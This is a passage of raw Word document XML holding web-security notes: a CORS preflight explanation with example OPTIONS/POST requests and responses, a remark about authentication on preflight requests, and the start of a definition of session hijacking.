          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> request returns headers that identify what is possible to do for the URL. If rights match, the browser executes the request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7718F" w:rsidRDefault="00D7718F" w:rsidP="00D7718F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="364D96"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="28575" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="2" name="Picture 2" descr="preflighted-reques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flighted-request">
                      <a:hlinkClick r:id="rId49"/>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 cy="9525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Here is an example exchange with a first cross-domain request (the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> one):</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OPTION /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>myresource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>/ HTTP/1.1</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Host:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> mydomain.org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lastRenderedPageBreak/>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Origin:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://test.org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Access-Control-Request-Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST</w:t>
      </w:r>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token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>Access-Control-Request-Headers:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> content-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>,accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>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And the corresponding response:</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0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>200 OK</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Access-Control-Allow-Origin:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://test.org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Access-Control-Allow-Methods:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST, GET, OPTIONS</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Access-Control-Allow-Headers:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> content-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>,accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>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token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>Access-Control-Max-Age:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1728000</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Since the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> pre-request succeeds, the browser will then send the actual request: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POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>myresource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>/ HTTP/1.1</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Host:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> mydomain.org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Content-type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Accept:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://test.org/example.html</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Origin:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://test.org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HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>[JSON Data]</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And the corresponding response:</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0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>200 OK</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Access-Control-Allow-Origin:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</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Content-Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>[JSON Data]</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This processing is completely transparent for the caller but we can have hints of what actually happens using the development tools of the browser, for example Firebug within Firefox. With the latter, we can use the Network tab to check which calls are executed and which CORS headers are exchanged.</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An important comment. You must take into account that, when executing CORS request containing security, i.e. an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> header, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> request won’t contain it. So you need to be careful regarding security when handling the first </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>preflighted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> ones. As a matter of fact, no authentication check can be done at this level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51201" w:rsidRDefault="00B861C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In computer science, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>session hijacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, sometimes also known as cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hijacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the exploitation of a valid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>computer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>—sometimes also called a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> key—to gain unauthorized access to information or services in a computer system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D496F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://itsecurity.telelink.com/session-hijacking/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CDCDCD"/>
        </w:pBdr>
        <w:spacing w:before="150" w:after="300"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:caps/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
          <w:caps/>
          <w:color w:val="1D496F"/>
        </w:rPr>
        <w:t>SESSION HIJACKING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:pStyle w:val="muted"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
